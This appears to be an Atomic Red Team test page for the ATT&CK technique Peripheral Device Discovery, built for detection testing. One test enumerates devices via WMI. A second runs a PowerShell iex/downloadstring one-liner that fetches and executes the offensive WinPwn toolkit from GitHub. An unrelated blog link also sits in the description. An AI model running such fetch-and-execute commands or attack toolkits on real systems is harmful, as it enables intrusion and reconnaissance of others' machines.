Try it using Invoke-Atomic

Peripheral Device Discovery

Description from ATT&CK

Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.(Citation: Peripheral Discovery Linux)(Citation: Peripheral Discovery macOS) Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions. https://www.aleksandrhovhannisyan.com/blog/how-to-add-a-copy-to-clipboard-button-to-your-jekyll-blog/

Atomic Tests

Atomic Test #1 - Win32_PnPEntity Hardware Inventory

Perform peripheral device discovery using Get-WMIObject Win32_PnPEntity

Supported Platforms: windows

auto_generated_guid: 2cb4dbf2-2dca-4597-8678-4d39d207a3a5

Inputs:

None

Attack Commands: Run with powershell!

1
2
3
Get-WMIObject Win32_PnPEntity | Format-Table Name, Description, Manufacturer > $env:TEMP\T1120_collection.txt
$Space,$Heading,$Break,$Data = Get-Content $env:TEMP\T1120_collection.txt
@($Heading; $Break; $Data |Sort-Object -Unique) | ? {$_.trim() -ne "" } |Set-Content $env:TEMP\T1120_collection.txt

Cleanup Commands:

1
Remove-Item $env:TEMP\T1120_collection.txt -ErrorAction Ignore

Atomic Test #2 - WinPwn - printercheck

Search for printers / potential vulns using printercheck function of WinPwn

Supported Platforms: windows

auto_generated_guid: cb6e76ca-861e-4a7f-be08-564caa3e6f75

Inputs:

None

Attack Commands: Run with powershell!

1
2
3
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
printercheck -noninteractive -consoleoutput

source